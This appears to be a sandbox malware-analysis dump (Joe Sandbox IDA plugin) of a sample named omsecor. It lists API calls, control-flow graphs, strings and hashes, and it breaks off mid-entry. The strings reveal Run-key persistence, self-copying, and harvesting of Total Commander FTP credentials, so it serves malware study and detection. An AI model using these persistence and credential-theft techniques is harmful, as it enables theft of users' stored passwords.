                          • Opcode ID: 436f779fc0fdf30fb8c2a4f5b6e2e396cf7c0272443af951d572ffac3d80a1eb
                          • Instruction ID: 1a7e216e592b3cd04d2002f0154b272c3d781bc2d345389bf2442321812c8d59
                          • Opcode Fuzzy Hash: 436f779fc0fdf30fb8c2a4f5b6e2e396cf7c0272443af951d572ffac3d80a1eb
                          • Instruction Fuzzy Hash: 96F062305013129BC7215F24DE44E6A3AB89F407947154136F854F22F0EF34DC018A6D

                          Control-flow Graph

                          APIs
                          • GetStartupInfoA.KERNEL32(?), ref: 004016EA
                          • GetProcessHeap.KERNEL32(00000000,00000094), ref: 00401705
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00401708
                          • _fast_error_exit.LIBCMT ref: 00401716
                            • Part of subcall function 00401671: __FF_MSGBANNER.LIBCMT ref: 0040167A
                          • ___security_init_cookie.LIBCMT ref: 004018B6
                          Strings
                          Memory Dump Source
                          • Source File: 00000017.00000002.2375599383.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000017.00000002.2375527486.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000017.00000002.2375599383.000000000040D000.00000040.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000017.00000002.2375742037.0000000000422000.00000008.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_23_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Heap$AllocateInfoProcessStartup___security_init_cookie_fast_error_exit
                          • String ID: j`h
                          • API String ID: 2660455748-2627015977
                          • Opcode ID: aba137c0f2f88c3b9200040e126f3ca684e81be6c5eda89adfc1ccd5f8954634
                          • Instruction ID: 7291aa48b631972549e6df949c7a5fbc9f7bec4cf14f78cf3737268845182a7c
                          • Opcode Fuzzy Hash: aba137c0f2f88c3b9200040e126f3ca684e81be6c5eda89adfc1ccd5f8954634
                          • Instruction Fuzzy Hash: C3F02E36D01705A7E720A7B4CE49B6D3134AB88765F35013BF5017B2E2CABC4D06A62D
                          APIs
                          • GetStartupInfoA.KERNEL32(?), ref: 004016EA
                          • GetProcessHeap.KERNEL32(00000000,00000094), ref: 00401705
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00401708
                          • _fast_error_exit.LIBCMT ref: 00401716
                            • Part of subcall function 00401671: __FF_MSGBANNER.LIBCMT ref: 0040167A
                          • ___security_init_cookie.LIBCMT ref: 004018B6
                          Strings
                          Memory Dump Source
                          • Source File: 00000017.00000002.2375599383.000000000040D000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000017.00000002.2375527486.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000017.00000002.2375599383.0000000000401000.00000040.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000017.00000002.2375742037.0000000000422000.00000008.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_23_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Heap$AllocateInfoProcessStartup___security_init_cookie_fast_error_exit
                          • String ID: j`h
                          • API String ID: 2660455748-2627015977
                          • Opcode ID: c8d3cbbb43655427b4a603559900b38778fbedebf47b5c9131e32ddd9e0d4b3d
                          • Instruction ID: 38895570f31eb67b982826470c9dd1e6c230b0faa58df9c9f10e023fb9096192
                          • Opcode Fuzzy Hash: c8d3cbbb43655427b4a603559900b38778fbedebf47b5c9131e32ddd9e0d4b3d
                          • Instruction Fuzzy Hash: 4DF0E936E48301D7E720A7A09D49B2D3134AB44765F34053BE001BB2E1CDBC4942661F
                          APIs
                          • __lock.LIBCMT ref: 00403F82
                            • Part of subcall function 004034EE: __mtinitlocknum.LIBCMT ref: 00403502
                            • Part of subcall function 004034EE: __amsg_exit.LIBCMT ref: 0040350E
                            • Part of subcall function 004034EE: RtlEnterCriticalSection.NTDLL(?), ref: 00403516
                          • ___sbh_find_block.LIBCMT ref: 00403F8D
                          • ___sbh_free_block.LIBCMT ref: 00403F9C
                          • HeapFree.KERNEL32(00000000,?,00409450,0000000C,004034CF,00000000,004093D0,0000000C,00403507,?,?,?,00406798,00000004,00409530,0000000C), ref: 00403FCC
                          • GetLastError.KERNEL32(?,00406798,00000004,00409530,0000000C,00404045,?,?,00000000,00000000,00000000,00401CEF,00000001,00000214), ref: 00403FDD
                          Memory Dump Source
                          • Source File: 00000017.00000002.2375599383.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000017.00000002.2375527486.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000017.00000002.2375599383.000000000040D000.00000040.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000017.00000002.2375742037.0000000000422000.00000008.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_23_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                          • String ID:
                          • API String ID: 2714421763-0
                          • Opcode ID: 288a25c0387cb816e710d6056d2e667d0bdf05a7bdcb3ee8ac501960d13b8eb0
                          • Instruction ID: 478c35e85f2b107ed22a8aba67e00a0e018390ca299f0d6e226d856ee505d4b6
                          • Opcode Fuzzy Hash: 288a25c0387cb816e710d6056d2e667d0bdf05a7bdcb3ee8ac501960d13b8eb0
                          • Instruction Fuzzy Hash: AB012C71D05602AADB207FB29A0AB5E7A78DF0076AF20413FF404B61D1CB7C8A449A9D
                          APIs
                            • Part of subcall function 00401D3D: __amsg_exit.LIBCMT ref: 00401D4B
                          • __amsg_exit.LIBCMT ref: 00403A5F
                          • __lock.LIBCMT ref: 00403A6F
                          • InterlockedDecrement.KERNEL32(?), ref: 00403A8C
                          • InterlockedIncrement.KERNEL32(02181588), ref: 00403AB7
                          Memory Dump Source
                          • Source File: 00000017.00000002.2375599383.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000017.00000002.2375527486.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000017.00000002.2375599383.000000000040D000.00000040.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000017.00000002.2375742037.0000000000422000.00000008.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_23_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Interlocked__amsg_exit$DecrementIncrement__lock
                          • String ID:
                          • API String ID: 4129207761-0
                          • Opcode ID: 8585fda054ee7361396d1f478d0024bbf818f9282079b570ad35bde21b9f8bf2
                          • Instruction ID: 3b707b5fd0894213fb8e8695ce472a26b52a1803b1b57e4fe7db1faaf9775e12
                          • Opcode Fuzzy Hash: 8585fda054ee7361396d1f478d0024bbf818f9282079b570ad35bde21b9f8bf2
                          • Instruction Fuzzy Hash: 3A018E32E00B119BD611AF6A990974A7B64BB05716F05403BE890773D1C73CAB51DFDE
                          APIs
                          • GetLastError.KERNEL32(?,00000000,00404281,00402202,00000000,00402EFA,FFFFFFFE,?,?,?,?,00402F66), ref: 00401CC8
                            • Part of subcall function 00401B98: TlsGetValue.KERNEL32(00000000,00401CDB,?,?,?,00402F66), ref: 00401B9F
                            • Part of subcall function 00401B98: TlsSetValue.KERNEL32(00000000,?,?,00402F66), ref: 00401BC0
                          • __calloc_crt.LIBCMT ref: 00401CEA
                            • Part of subcall function 00404032: __calloc_impl.LIBCMT ref: 00404040
                            • Part of subcall function 00404032: Sleep.KERNEL32(00000000), ref: 00404057
                            • Part of subcall function 00401B21: TlsGetValue.KERNEL32(00000000,00401BB6,?,?,?,00402F66), ref: 00401B2E
                            • Part of subcall function 00401B21: TlsGetValue.KERNEL32(00000004,?,?,?,00402F66), ref: 00401B45
                            • Part of subcall function 00401C07: GetModuleHandleA.KERNEL32(KERNEL32.DLL,00409328,0000000C,00401D18,00000000,00000000,?,?,?,00402F66), ref: 00401C18
                            • Part of subcall function 00401C07: GetProcAddress.KERNEL32(?,EncodePointer), ref: 00401C4C
                            • Part of subcall function 00401C07: GetProcAddress.KERNEL32(?,DecodePointer), ref: 00401C5C
                            • Part of subcall function 00401C07: InterlockedIncrement.KERNEL32(0040A3C8), ref: 00401C7E
                            • Part of subcall function 00401C07: __lock.LIBCMT ref: 00401C86
                            • Part of subcall function 00401C07: ___addlocaleref.LIBCMT ref: 00401CA5
                          • GetCurrentThreadId.KERNEL32 ref: 00401D1A
                          • SetLastError.KERNEL32(00000000,?,?,?,00402F66), ref: 00401D32
                          Memory Dump Source
                          • Source File: 00000017.00000002.2375599383.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000017.00000002.2375527486.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000017.00000002.2375599383.000000000040D000.00000040.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000017.00000002.2375742037.0000000000422000.00000008.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_23_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Value$AddressErrorLastProc$CurrentHandleIncrementInterlockedModuleSleepThread___addlocaleref__calloc_crt__calloc_impl__lock
                          • String ID:
                          • API String ID: 1081334783-0
                          • Opcode ID: 098acf1058f6266e08016df3b7da3ea01f889e9df5624f40869082c495d6053c
                          • Instruction ID: d2849ffa799b97934cc6d9bfafbcb639600e9549b280b5eba9c9c239b681eae2
                          • Opcode Fuzzy Hash: 098acf1058f6266e08016df3b7da3ea01f889e9df5624f40869082c495d6053c
                          • Instruction Fuzzy Hash: 2EF0FF325447229AD6363BB96D0AA8F3AA49F41761711093FF580B61F0CF3CD80296AD

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 121 40abd9-40abf5 call 40ac20 124 40abf7-40ac0c FindFirstFileW 121->124 125 40ac1a 121->125 124->125 126 40ac0e-40ac18 FindClose 124->126 127 40ac1c-40ac1f 125->127 126->127
                          APIs
                            • Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,771B0900,00000400,00000000, /nomove,?,0040AB30,?,?,0040B3E5), ref: 0040AC44
                            • Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,0040AB30,?,?,0040B3E5), ref: 0040AC72
                          • FindFirstFileW.KERNEL32(?,00000000), ref: 0040AC03
                          • FindClose.KERNEL32(00000000), ref: 0040AC0F
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: FindOpen$CloseFileFirst
                          • String ID:
                          • API String ID: 3155378417-0
                          • Opcode ID: ab3d299b7ad4ae48143099222020c13c56cdbf39ef5f27e8c74799f3a551cc1f
                          • Instruction ID: fa0310e4c65bbc590993533f650c85f5e3ee77ef27cd51fa1c8f473dbf319076
                          • Opcode Fuzzy Hash: ab3d299b7ad4ae48143099222020c13c56cdbf39ef5f27e8c74799f3a551cc1f
                          • Instruction Fuzzy Hash: 5DE0D87160C7044BE220E7B49D0C967B3DCAB45325F000F36A9B6E20C0FA38D46A465F

                          Control-flow Graph

                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B36C
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B39D
                            • Part of subcall function 004069FD: RegCreateKeyExW.ADVAPI32(0040EA48,00000000,00000000,00000000,00000000,00020006,00000000,00000002,0040EA48,?,?,?,?,00406AD3,80000001,AppEvents\Schemes\Apps\Explorer\Navigating\.current), ref: 00406A22
                          • GetLastError.KERNEL32(00000004), ref: 0040B3CA
                          • Sleep.KERNEL32(00002710), ref: 0040B3F7
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B413
                          • CopyFileW.KERNEL32(?,?,00000000), ref: 0040B435
                          • ExitProcess.KERNEL32 ref: 0040B44D
                            • Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,771B0900,00000400,00000000, /nomove,?,0040AB30,?,?,0040B3E5), ref: 0040AC44
                            • Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,0040AB30,?,?,0040B3E5), ref: 0040AC72
                          • GetLastError.KERNEL32(00000004), ref: 0040B48D
                          • GetLastError.KERNEL32(00000004), ref: 0040B49A
                          • ExpandEnvironmentStringsW.KERNEL32(?,00000400), ref: 0040B4C7
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B4D7
                          • GetLastError.KERNEL32(00000004), ref: 0040B500
                          Strings
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: File$ErrorLastModuleName$Open$CopyCreateEnvironmentExitExpandProcessSleepStrings
                          • String ID: /nomove$IueiOod$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$opeqmc.exe
                          • API String ID: 3692109554-477663111
                          • Opcode ID: 55bb52feb6c62d8aec5773147cbc2c373a20a80f20ddf5eadf9f4fa8ccd6a04a
                          • Instruction ID: ccf8aad4361994264e72a39918ed7d53ff083e628d4a69ee62a5d407c68d8035
                          • Opcode Fuzzy Hash: 55bb52feb6c62d8aec5773147cbc2c373a20a80f20ddf5eadf9f4fa8ccd6a04a
                          • Instruction Fuzzy Hash: 8C4127719042186AE710B7A19D46FAB73ACEF04345F14447BBB05F11C2EB789A548AAF

                          Control-flow Graph

                          APIs
                          • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,00000000,00000400), ref: 004075FC
                          • CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00407618
                          • GetFileSize.KERNEL32(?,00000000), ref: 0040762E
                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00407638
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0040763F
                          • ReadFile.KERNELBASE(?,00000000,00000000,?,00000000), ref: 00407660
                          • WriteFile.KERNELBASE(?,?,00000000,?,00000000), ref: 0040767F
                          • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000), ref: 00407691
                          • ReadFile.KERNELBASE(?,?,00000040,?,00000000), ref: 004076A1
                          • SetFilePointer.KERNELBASE(?,?,00000000,00000000), ref: 004076AF
                          • ReadFile.KERNELBASE(?,?,000000F8,?,00000000), ref: 004076C5
                          • SetFilePointer.KERNELBASE(?,?,00000000,00000000), ref: 004076EF
                          • WriteFile.KERNELBASE(?,?,000000F8,?,00000000), ref: 00407705
                          • CloseHandle.KERNELBASE(?), ref: 00407714
                          • CloseHandle.KERNEL32(?), ref: 00407719
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: File$PointerRead$CloseCreateHandleHeapWrite$AllocateProcessSize
                          • String ID:
                          • API String ID: 2296163861-0
                          • Opcode ID: 894f1e02061cece153af19de11902bbae5fe70548c4ece14d410128547cdf08b
                          • Instruction ID: 7ae3b020874f099f6a4231377d147a855b3f50186be4225f3fece46b7b724b47
                          • Opcode Fuzzy Hash: 894f1e02061cece153af19de11902bbae5fe70548c4ece14d410128547cdf08b
                          • Instruction Fuzzy Hash: F0416A71901028BADB209BA2DD48EEFBF7DEF45390F104476F619F21A0D7709A10DB64

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 73 40ac20-40ac48 RegOpenKeyExW 74 40ac60-40ac76 RegOpenKeyExW 73->74 75 40ac4a-40ac55 call 4069c0 73->75 76 40ac78-40ac7a 74->76 77 40ac7c-40ac87 call 4069c0 74->77 81 40ac5a-40ac5e 75->81 79 40ac8e-40ac92 76->79 82 40ac8c-40ac8d 77->82 81->74 81->79 82->79
                          APIs
                          • RegOpenKeyExW.KERNELBASE(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,771B0900,00000400,00000000, /nomove,?,0040AB30,?,?,0040B3E5), ref: 0040AC44
                          • RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,0040AB30,?,?,0040B3E5), ref: 0040AC72
                            • Part of subcall function 004069C0: RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000,7686E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
                            • Part of subcall function 004069C0: RegCloseKey.KERNELBASE(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED
                          Strings
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Open$CloseQueryValue
                          • String ID: /nomove$IueiOod$SOFTWARE\Microsoft\Windows\CurrentVersion\Run
                          • API String ID: 3546245721-4228964922
                          • Opcode ID: e183a9483fa9f7ba9bb43204af9f8e84b77f88267b9ccf7be8296576afd26502
                          • Instruction ID: 3bac8edf5f415b784fe4546894dc74dc09b9405a13c640cee1cd261e7a9a2bb6
                          • Opcode Fuzzy Hash: e183a9483fa9f7ba9bb43204af9f8e84b77f88267b9ccf7be8296576afd26502
                          • Instruction Fuzzy Hash: 5F01867265430EFEFF1096919D42F9A736CDB40768F210036FA00B60D1D6B6AE155779

                          Control-flow Graph

                          APIs
                          • GetCommandLineW.KERNEL32(?,0040B3E5), ref: 0040AB0A
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000820,00000400,?,0040B3E5), ref: 0040AB44
                          • CharLowerW.USER32(?,?,0040B3E5), ref: 0040AB57
                          • CharLowerW.USER32(?,?,0040B3E5), ref: 0040AB60
                          Strings
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CharLower$CommandFileLineModuleName
                          • String ID: /nomove
                          • API String ID: 1338073227-1111986840
                          • Opcode ID: 00c7a09b5e38cd9dc17e43fc8aab8f350de87f2bf6048177a511846302a86bad
                          • Instruction ID: b8029fc6669f79c45f6caaa8ce38406425976cf3cabd4088da44db58d281c6d8
                          • Opcode Fuzzy Hash: 00c7a09b5e38cd9dc17e43fc8aab8f350de87f2bf6048177a511846302a86bad
                          • Instruction Fuzzy Hash: 7CF01D7290022956DB10A7B19C05BDB72ACFF40309F0445B6AA05F2180ED78EA548F95

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 96 407727-407751 call 40d5b0 GetModuleFileNameW 99 407753-40776b call 4075d4 96->99 100 40776d-40776e 96->100 105 4077e1-4077ea 99->105 102 407774-407797 ExpandEnvironmentStringsW call 4075d4 100->102 106 40779c-4077a0 102->106 107 4077a2-4077a5 106->107 108 4077eb-4077ee 106->108 110 4077b7-4077ba 107->110 111 4077a7-4077b5 GetLastError 107->111 109 4077e0 108->109 109->105 112 4077d2-4077dc 110->112 113 4077bc-4077c8 GetLastError 110->113 114 4077ca-4077cf call 40a786 111->114 112->102 116 4077de 112->116 113->114 114->112 116->109
                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400,771B0900,00000400,00000000,0040B4B3,00000000), ref: 00407744
                          • ExpandEnvironmentStringsW.KERNEL32(?,00000400), ref: 00407784
                          • GetLastError.KERNEL32(00000004), ref: 004077A9
                            • Part of subcall function 004075D4: CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,00000000,00000400), ref: 004075FC
                            • Part of subcall function 004075D4: CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00407618
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: File$Create$EnvironmentErrorExpandLastModuleNameStrings
                          • String ID:
                          • API String ID: 1536607067-0
                          • Opcode ID: eafcbf4a8c3930913d522f5c7b72beb30a71f0d0c1af5e3f4189f884763461bb
                          • Instruction ID: de8f4f1c442ba604be96c6aabbb627c7d922d162aa2fadd5385f895ae0141ebd
                          • Opcode Fuzzy Hash: eafcbf4a8c3930913d522f5c7b72beb30a71f0d0c1af5e3f4189f884763461bb
                          • Instruction Fuzzy Hash: AD11E972908249AED720D7A19C81FEB739CFB44354F10483BFB95E30D0E678B945866B

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 118 4077f0-407829 call 40d530 CreateProcessW
                          APIs
                          • _memset.LIBCMT ref: 00407800
                          • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,?,?,?,?,00000400), ref: 0040781B
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CreateProcess_memset
                          • String ID:
                          • API String ID: 1177741608-0
                          • Opcode ID: 0cd9a43e4f1b4c0064b4bee2692f9063eedacf03e95d61430481666f95000588
                          • Instruction ID: 3694313203bda926a09df6f19e1a61ce713b6a49f930e6e3ed03be73a1123fdc
                          • Opcode Fuzzy Hash: 0cd9a43e4f1b4c0064b4bee2692f9063eedacf03e95d61430481666f95000588
                          • Instruction Fuzzy Hash: 1DE048B294113876DB20A6E69C0DDDF7F6CDF06694F000121BA0EE50C4E5749608C6F5

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 128 4069c0-4069fc RegQueryValueExW RegCloseKey
                          APIs
                          • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000,7686E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
                          • RegCloseKey.KERNELBASE(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CloseQueryValue
                          • String ID:
                          • API String ID: 3356406503-0
                          • Opcode ID: 149707b6f704b0206dcd429f7e61dcdc4ff4cc903c0dfabc6e5b0404234ae6db
                          • Instruction ID: 7cb27e63b8b96f7a1a34dd7d249ffcc2d4336ce0f7aa5f451266b78b49120899
                          • Opcode Fuzzy Hash: 149707b6f704b0206dcd429f7e61dcdc4ff4cc903c0dfabc6e5b0404234ae6db
                          • Instruction Fuzzy Hash: DCE06D7A000208BBEF104F94CD09BD97BB9EB44358F208464BA00A6150D67596149B14

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 129 4039ea-403a14 HeapAlloc 130 403bba-403bbe 129->130 131 403a1a-403a30 GetPrivateProfileStringW 129->131 132 403bb3-403bb9 call 40be3a 131->132 133 403a36-403a42 call 40c475 131->133 132->130 133->132 138 403a48-403a5e HeapAlloc 133->138 138->132 139 403a64-403ac3 call 405511 * 5 138->139 150 403ac8-403ad7 StrStrIW 139->150 151 403b93-403ba3 call 40c495 150->151 152 403add-403aec StrStrIW 150->152 151->150 158 403ba9-403bb2 call 40be3a 151->158 152->151 153 403af2-403b03 GetPrivateProfileStringW 152->153 153->151 155 403b09-403b24 GetPrivateProfileStringW 153->155 155->151 157 403b26-403b3a GetPrivateProfileStringW 155->157 157->151 159 403b3c-403b47 call 403877 157->159 158->132 159->151 164 403b49-403b7b call 405511 call 40c3f9 159->164 169 403b90 164->169 170 403b7d-403b8b call 40c00b 164->170 169->151 170->169 173 403b8d 170->173 173->169
                          APIs
                          • HeapAlloc.KERNEL32(00000008,00020002,?,00000104,SOFTWARE\Ghisler\Total Commander), ref: 00403A09
                          • GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 00403A2C
                          • HeapAlloc.KERNEL32(00000008,00000C0C), ref: 00403A55
                          • StrStrIW.SHLWAPI(?,?), ref: 00403ACF
                          • StrStrIW.SHLWAPI(?,?), ref: 00403AE4
                          • GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00403AFF
                          • GetPrivateProfileStringW.KERNEL32(?,?,00000000,000001FE,000000FF,?), ref: 00403B20
                          • GetPrivateProfileStringW.KERNEL32(?,?,00000000,?,000000FF,?), ref: 00403B36
                          Strings
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: PrivateProfileString$AllocHeap
                          • String ID: SOFTWARE\Ghisler\Total Commander$connections$default$ftp://%s:%s@%s$host$password$username
                          • API String ID: 2479592106-2015850556
                          • Opcode ID: c368ffed181334e4a999fe46bdaddc7fa5d9e929cd71afacdc90b45fbd8a1971
                          • Instruction ID: 106d3b010c48b16868dcb071ba678aa04ac33b338b72d514ced31169f03d36dc
                          • Opcode Fuzzy Hash: c368ffed181334e4a999fe46bdaddc7fa5d9e929cd71afacdc90b45fbd8a1971
                          • Instruction Fuzzy Hash: A2513D71900109BAEB11EFA5DD41EAEBBBDEF44308F204077E904F6292D775AF068B58

                          Control-flow Graph

                          APIs
                            • Part of subcall function 00406A68: RegOpenKeyExW.ADVAPI32(80000001,AppEvents\Schemes\Apps\Explorer\Navigating\.current,00000000,00000001,?,00420840,?,00000000), ref: 00406A8C
                            • Part of subcall function 00406ADF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00420840,?,00000000,?,004032CE,00420840,?,00000000,?,?,0040B182), ref: 00406B2A
                          • GetSystemMetrics.USER32(00000000), ref: 004032E5
                          • GetSystemMetrics.USER32(00000001), ref: 004032ED
                          • VirtualProtect.KERNEL32(75A90B80,0000000A,00000008,?,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 00403309
                          • VirtualProtect.KERNEL32(75A90B88,0000000A,?,?,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 00403333
                          • SetUnhandledExceptionFilter.KERNEL32(004032AF,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 0040333A
                          • LoadLibraryW.KERNEL32(atl,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 00403345
                          • GetProcAddress.KERNEL32(00000000,AtlAxWinInit), ref: 0040335D
                          • GetProcAddress.KERNEL32(00000000,AtlAxAttachControl), ref: 0040336A
                          • GetProcAddress.KERNEL32(00000000,AtlAxGetControl), ref: 00403377
                          Strings
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AddressProc$MetricsOpenProtectSystemVirtual$ExceptionFilterLibraryLoadUnhandled
                          • String ID: AtlAxAttachControl$AtlAxGetControl$AtlAxWinInit$atl
                          • API String ID: 3066332896-2664446222
                          • Opcode ID: fe1f50a485c472adffca313bd216073f3c2af1e46121dbe202f23b587a8dcd22
                          • Instruction ID: 61d9a237d914756188f526d52bf2e891562662c8e4878cb3977fb5d3c9d5a9bd
                          • Opcode Fuzzy Hash: fe1f50a485c472adffca313bd216073f3c2af1e46121dbe202f23b587a8dcd22
                          • Instruction Fuzzy Hash: E6212771900390EED3019FBAAD84A5A7FE8EB5B31171545BBE556F32A0C7B80902CB79
                          APIs
                            • Part of subcall function 0040821C: PathCombineW.SHLWAPI(?,?,0040EC40,00408268,?,00000000,?,00000000,00000000), ref: 0040823C
                          • HeapAlloc.KERNEL32(00000008,00020002), ref: 00403566
                          • GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 0040358A
                          • HeapAlloc.KERNEL32(00000008,00000C20), ref: 004035B5
                          • GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00403639
                          • GetPrivateProfileIntW.KERNEL32(?,?,00000015,?), ref: 00403653
                          • GetPrivateProfileStringW.KERNEL32(?,?,00000000,-000001FE,000000FF,?), ref: 00403681
                          Strings
                          Memory Dump Source
